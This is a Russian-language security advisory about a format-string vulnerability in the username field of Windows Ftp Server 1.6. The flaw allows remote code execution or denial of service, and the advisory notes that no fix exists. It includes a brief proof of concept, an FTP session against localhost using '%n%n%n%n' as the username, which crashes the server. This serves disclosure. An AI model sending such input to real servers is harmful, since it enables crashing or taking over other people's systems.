Удаленное выполнение произволного кода в Windows Ftp Server
| Дата публикации: | 13.01.2004 |
| Дата изменения: | 16.10.2006 |
| Всего просмотров: | 1300 |
| Опасность: | Высокая |
| Наличие исправления: | Нет |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Удаленная |
| Воздействие: |
Отказ в обслуживании Компрометация системы |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | Windows Ftp Server 1.x |
| Уязвимые версии: Windows Ftp Server 1.6
Описание: Уязвимость форматной строки обнаружена в Windows Ftp Server. Удаленный пользователь может выполнить произвольный код на целевой системе. Сервер не определяет форматную строку при обработке данных, представленных пользователем в поле 'username'. Пример/Эксплоит: Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>ftp 127.0.0.1 Connected to 127.0.0.1. 220 Welcome to Windows FTP Server User (127.0.0.1:(none)): %n%n%n%n Connection closed by remote host. C:\WINDOWS\system32> URL производителя:http://srv.nease.net/index.htm Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
| Ссылки: | Windows FTP Server Format String Vulnerability |